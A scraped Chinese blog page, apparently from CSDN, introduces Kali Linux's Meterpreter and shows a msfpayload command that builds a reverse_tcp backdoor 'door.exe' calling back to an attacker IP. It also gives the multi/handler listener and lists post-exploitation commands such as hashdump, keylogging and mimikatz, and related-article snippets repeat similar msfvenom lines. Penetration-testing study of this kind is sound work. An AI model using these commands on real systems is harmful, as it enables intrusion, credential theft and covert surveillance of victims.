kali漏洞利用之Meterpreter介绍

最新推荐文章于 2025-04-16 22:32:58 发布
原创 最新推荐文章于 2025-04-16 22:32:58 发布 · 4k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#漏洞 #exe #tcp

本文介绍了如何在Kali Linux中生成和利用Meterpreter后门。通过设置LHOST和LPORT参数,将door.exe植入目标主机,然后在Kali上开启handler等待连接。成功连接后,可以使用Meterpreter的各种命令,如sysinfo、hashdump、screenshot、keyscan_start等进行系统信息查看、哈希抓取、屏幕截图和键盘记录。此外,还提及了扩展工具mimikatz和wdigest,它们能用于抓取明文密码和凭据。

这里写图片描述
使用示例:

1.生成Meterpreter后门

命令语句如下,如果其中的IP为kali攻击机的IP地址,后面跟着的是参数。

msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe

 这个语句中,如果不知道参数是什么,可以在metasploit中查看,查看方式如下
 

use exploit/multi/handler

用这个exp来接受返回的链接

最低0.47元/天 解锁文章
Kali Linux 漏洞利用工具集 metasploit 教程
Sumarua的博客
07-27 3174
文章目录Kali Linux 漏洞利用工具集 metasploit 教程理解基本概念和术语metasploit 命令用法:核心命令模块命令工作命令资源脚本命令数据库后端命令凭证后端命令Metasploit效果与评价: Kali Linux 漏洞利用工具集 metasploit 教程 Metasploit Pro是一个开发和漏洞验证工具,可帮助您将渗透测试工作流划分为更小,更易管理的任务。借助Metasploit Pro,您可以通过基于Web的用户界面利用Metasploit Framework及其利用数据库
[Kali]--Meterpreter深度渗透
wwxxee
11-06 1111
Meterpreter深度渗透 通常情况下,meterpreter的权限就是被攻击进程的启动权限或被攻击用户的执行权限。 Meterpreter会话下: upload:从kali主机上传到靶机 upload /usr/share/windows-binarier/nc.exe C:\ getuid:查看meterpreter的系统运行权限 ps:当前正在运行的进程列表 download:从靶机下载文件到本机上 systeminfo: execute -f notepad.exe:执行程序,加-H可
kali linux之Meterpreter
weixin_30950887的博客
03-07 1356
高级,动态,可扩展的payload 基于meterpreter上下文利用更多漏洞发起攻击,后渗透阶段一站式操作界面 完全基于内存的dll注入式payload(不写硬盘) 注入合法系统进程并建立stager 基于stager上传和预加载dll进行扩展模块的注入(客户端api) 基于stager建立的socket连接建立加密的TLS/1.0通信隧道 ...
KALI2.0 meterpreter 运用
yemaxq的博客
09-26 2096
初试牛刀 1、生产EXE   就用meterpreter  (shell 一个含义)    (KALI2.0以前版本 为 msfpayload )2.0后 新命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX -f exe  > 1234.exe 2、默认生成地址是 ROOT  查看 后 直接经 
kaliMeterpreter控制win10,可以偷看你的电脑的所有数据
微信号:RunsenLiu
10-20 6205
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、...
Kali 渗透测试:Meterpreter在Windows系统下的使用
Bruce_xiaowei的博客
05-11 4305
Kali 渗透测试:Meterpreter在Windows系统下的使用 实 验 环 境: VMware Workstation 16 PRO 操作机:Kali Linux 5.10.0 IP(192.168.68.125) 靶机:Win7 实 验 步 骤: 1. 生成被控端payload 在操作机执行如下命令: ┌──(root💀kali)-[~] └─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.68.125 L
kali漏洞利用之Metasploit实战
热门推荐
The__Apollo的博客
04-22 2万+
Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。1.启动服务:在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录 2.路径介绍kali中,
精选资源
kali Linux系统的漏洞利用
06-19
Meterpreter是Metasploit框架的核心组件之一,它可以作为漏洞利用成功后的一个后门程序,为攻击者提供与受害主机之间的交互式通信渠道。 - **功能介绍**: - 文件系统访问。 - 系统信息收集。 - 网络监听。 - ...
网络安全kali web安全 Kalimsf简单的漏洞利用
xueshenlaila的博客
03-08 1万+
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms
kali-漏洞利用】(3.3)后渗透之Meterpreter(上):命令大全
08-06 4812
kali-漏洞利用Meterpreter后渗透
Kali——Meterpreter后渗透攻击模块-Metasploit的module模块衍生
qq_63167128的博客
03-07 1444
介绍:本文展示了Meterpreter作为Metasploit模块之一的简要概念讲解及攻击流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。 挂个链接:深信服产业教育中心 Meterpreter模块作为后渗透攻击(该阶段通常从攻陷了目标的一些系统和获取了一部分区域系统管理权限后开始)模块的实施通道,可以根据渗透目标需求进行灵活拓展,涉及范围:信息收集,口令攫取,权限提升,内网拓展等等 ​
利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑
WuHao的博客
10-26 6197
前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马。 首先安装Venom Venon克隆地址:https://github.com/r00t-3xp10it/venom tar.gz OR zip OR git clone 2.赋予文件可执行权限: cd venom-main sudo chmod -R +x *.sh 3.安装依赖关系包: cd aux sudo ./setup.sh 4.运行 sudo.
基于22版kali与win7靶机的meterpreter 后渗透记录
xingyuan_king的博客
12-17 1500
1.利用metasploit框架对windows靶机进行渗透测试 2.能够使用meterpreter 后渗透工具完成对攻击的持久化、提权、流量收集、密码破解等操作。
MSF模拟渗透测试攻击linux实例
lza20001103的博客
04-09 1万+
MSF模拟渗透测试攻击linux实例
一文带你进入黑客的世界:Kali Linux 中的Metasploit渗透测试利器
资深程序员,曾自学JAVA,C#,如今从业于网安行业
04-11 997
本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。
搜寻目标网站后台登录地址
hjjshua的博客
05-22 3924
网站后台管理地址搜寻常用方法
12.3、后渗透测试--持久化后门
无痕的博客
12-13 3992
metasploit后渗透测试--持久化后门
KALI搭建log4j2靶场及漏洞复现全流程
最新发布
hp.puppy的博客
04-16 2581
KALI搭建log4j2靶场及漏洞复现全流程 KALI中Docker的安装 KALI中maven 的安装与配置 KALI搭建Vulfocus靶场并配置vulfocus漏洞环境 JNDI 注入工具安装 Log4j2远程命令执行(CVE-2021-44228)漏洞复现
基于java环境的漏洞利用获取shell
Time_worm的博客
07-25 460
通过此案例,告诉大家,软件升级还是很重要的,但是要选择正当途径升级更新。
kali 永恒之蓝漏洞sessions利用
03-19
要在 Kali Linux 中通过 Metasploit 利用 MS17-010 永恒之蓝漏洞创建 sessions,以下是具体方法: #### 1. **启动并配置环境** 确保攻击端和目标端的网络连接正常。根据描述,攻击端为 Kali Linux (IP 地址 `192....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值